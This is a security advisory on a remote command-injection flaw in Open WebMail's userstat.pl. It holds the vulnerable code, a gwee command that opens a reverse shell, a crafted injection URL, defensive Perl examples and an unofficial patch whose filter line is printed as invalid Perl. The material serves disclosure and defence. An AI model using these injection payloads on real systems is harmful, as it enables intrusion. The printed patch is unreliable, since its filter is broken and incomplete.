Open Webmail Remote Command Execution (userstat.pl)

Summary

Open WebMail is a webmail system based on Neomail version 1.14 by Ernie Miller. It is designed to manage very large mail folder files in a memory-efficient way and provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail. A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl.

Credit:

The information has been provided by Michel Blomgren.


Details

Vulnerable Systems:
 * Open Webmail versions 2.20, 2.21 and 2.30
 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)

The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script does not filter shell metacharacters out of the loginname parameter, and that value is then interpolated into the command line used to execute openwebmail-tool.pl. By adding a ';', '|' or '( )' followed by a shell command to an HTTP GET, HEAD or POST request, an attacker can execute arbitrary system commands as the unprivileged web server user (e.g. the Apache user, 'nobody' or 'www').

Vulnerable Code:
From userstat.pl (about line 52):
my $user = cookie('openwebmail-loginname') || param('loginname') || '';
my $playsound = param('playsound') || '';
my $html=qq|<a href='_URL_' target='_blank' style='text-decoration: none'>|.
         qq|<font color='_COLOR_'>_TEXT_</font></a>|;

if ($user ne '') {
   my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`; # <-- $user is interpolated unfiltered into the shell command
   if ($status =~ /has no mail/) {

Exploit:
At least two exploits are in circulation: one by Nullbyte and a rewrite of it by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30, 5.8MB) is limited (see 'Vendor Status' below). Gwee (generic web exploitation engine), available from http://cycom.se/dl/gwee, can be used with the following command:

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

 -L Use built-in TCP listener (like 'nc -l').
 -l The host or IP address to have the reverse shell code connect back to.
 -p The port to have the reverse shell code connect back to.

Vendor Status:
Cycom AB has provided a diff patch that fixes the issue. Ken Girrard wrote and published an advisory long before this one and provided a patch with it; that patch still leaves userstat.pl vulnerable to remote arbitrary command execution, and it is the one applied to (shipped with) openwebmail-current.tgz released 2004-04-30 (5.8MB).

Girrard's patch does not filter out '|' (pipes) or '/', but it does filter out spaces and tabs, which makes it impossible to pass arguments to the commands an attacker would want to execute.

Nevertheless, commands without arguments can still be executed. For example, an attacker who already has write access to the host (via FTP, say) could upload reverse shell code, mark it executable and place its absolute path in a crafted URL such as:
http://target/cgi-bin/openwebmail/userstat.pl?loginname=%7C/home/fu/bar
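The following Perl is an added example, not code from Open WebMail, from either patch, or from the advisory's author. It covers two points made above: how the loginname value from the vulnerable userstat.pl excerpt can be handled so that no shell ever sees it, and why the whitespace-only filter described under Vendor Status still accepts the '|/path' form. The function names (loginname_is_valid, strip_whitespace_only, mail_status), the allowed-character policy and the $tool path are assumptions for the example; the sample inputs in the loop are constructed.

```perl
#!/usr/bin/perl
# Added example (not Open WebMail code): safe handling of the loginname
# value before it reaches openwebmail-tool.pl.
use strict;
use warnings;

# Whitelist: a login name is letters, digits, '.', '_' and '-', at most
# 64 characters, and may not start with '-' so it cannot be read as an
# option by the tool. This policy is an assumption, not Open WebMail's.
sub loginname_is_valid {
    my ($name) = @_;
    return defined $name && $name =~ /\A[A-Za-z0-9_.][A-Za-z0-9_.-]{0,63}\z/;
}

# The blacklist approach the advisory describes, for comparison: it only
# removes spaces and tabs, so '|' and '/' survive untouched.
sub strip_whitespace_only {
    my ($name) = @_;
    $name =~ s/[ \t]//g;
    return $name;
}

# Run openwebmail-tool.pl without a shell. The list form of open('-|')
# execs the program directly with one argument per element, so no
# character in $user can be interpreted as shell syntax. $tool is an
# assumed absolute path to the script.
sub mail_status {
    my ($tool, $user) = @_;
    die "invalid loginname\n" unless loginname_is_valid($user);
    open(my $fh, '-|', $tool, '-m', '-e', $user)
        or die "cannot run $tool: $!\n";
    my $status = do { local $/; <$fh> };   # slurp the tool's output
    close $fh;
    return $status;
}

# Constructed inputs: a normal name, a ';' injection shape, the '|/path'
# shape from the advisory, and a name containing a tab.
for my $input ('alice', 'alice;x', '|/home/fu/bar', "bob\tx") {
    my $after_blacklist = strip_whitespace_only($input);
    printf "%-14s blacklist-> %-14s whitelist-> %s\n",
        $input, $after_blacklist,
        loginname_is_valid($after_blacklist) ? 'accept' : 'reject';
}
```

Running the loop shows that the whitespace filter leaves 'alice;x' and '|/home/fu/bar' intact, while the whitelist rejects both and accepts only 'alice'. The design point is that validation and execution are separated: even if the whitelist were later loosened, the list-form open keeps the value out of the shell, so there is no filter list that has to be complete.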

Unofficial Patch:
– — userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href=’_URL_’ target=’_blank’ style=’text-decoration: none’>|.
          qq|<font color=’_COLOR_’>_TEXT_</font></a>|;

+# filter out dangerous characters
+$user =~ s/[/’\’`|<>\()[]{}$s;&]//g;
+
 if ($user ne ”) {
    my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
    if ($status =~ /has no mail/) {
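Review bot: the character class in the added line `$user =~ s/[/’\’`|<>\()[]{}$s;&]//g;` is not valid Perl as printed: the leading `/` inside the class ends the pattern early, the inner `[` and `]` are unescaped so the class closes at the first `]`, and `$s` would be interpolated as a variable where `\s` was presumably meant, so the backslashes before `/`, `[`, `]` and `$` appear to have been lost. Beyond the syntax, a strip-list has the same weakness the advisory attributes to Girrard's patch: any metacharacter not on the list still reaches the shell. Suggest rejecting anything outside an allowed set instead (e.g. `$user =~ /^[\w.-]+$/ or exit;` before the `if ($user ne '')` check) and invoking openwebmail-tool.pl without a shell via the list form, e.g. `open(my $fh, '-|', "$ow_cgidir/openwebmail-tool.pl", '-m', '-e', $user)`, so the fix no longer depends on the filter list being complete.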

To apply: cd cgi-bin/openwebmail/ and run: $ patch -i owm.patch

Categories: UNIX